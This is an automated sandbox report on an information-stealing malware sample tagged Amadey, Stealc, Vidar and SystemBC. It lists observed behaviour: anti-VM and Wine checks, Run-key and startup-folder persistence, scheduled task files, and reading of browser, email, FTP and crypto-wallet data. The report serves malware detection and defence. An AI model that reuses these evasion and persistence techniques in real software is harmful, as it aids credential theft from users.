Malware Analysis Report

2025-04-03 09:34

Sample ID 250306-drp9lsxms9
Target 2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916
SHA256 2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916
Tags
amadey litehttp stealc systembc 092155 traff1 bot credential_access defense_evasion discovery execution persistence spyware stealer trojan vidar ir7am
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916

Threat Level: Known bad

The file 2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916 was found to be: Known bad.

Malicious Activity Summary

amadey litehttp stealc systembc 092155 traff1 bot credential_access defense_evasion discovery execution persistence spyware stealer trojan vidar ir7am

Systembc family

LiteHTTP

Litehttp family

Amadey family

Vidar

Stealc family

Vidar family

SystemBC

Stealc

Detect Vidar Stealer

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Uses browser remote debugging

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Executes dropped EXE

.NET Reactor proctector

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of local email clients

Checks computer location settings

Identifies Wine through registry keys

Unsecured Credentials: Credentials In Files

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies system certificate store

Delays execution with timeout.exe

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 03:14

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 03:14

Reported

2025-03-06 03:17

Platform

win7-20240903-en

Max time kernel

140s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2bbc2bd7a6b06f43cb84364bd2fefd79bdca112a79760d6568add6032b8a0916.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\mjhhg\ocqhk.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\mjhhg\ocqhk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\mjhhg\ocqhk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109460101\cf6ef5812d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109610101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109620101\Ps7WqSx.exe N/A
N/A N/A C:\ProgramData\mjhhg\ocqhk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109680101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109690101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109630101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109700101\8dbc0f59a8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\TempPP5JTXANM9NISTRGTZEXTDUK53WXSKZV.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109600101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine C:\ProgramData\mjhhg\ocqhk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109660101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf6ef5812d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109460101\\cf6ef5812d.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109470121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\bIyl6r6e\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10109650101\ce4pMzk.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempLY7F58WLBN2MXYPKEMUWZA8VDAQH3WJE.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109590101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109640101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109670101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
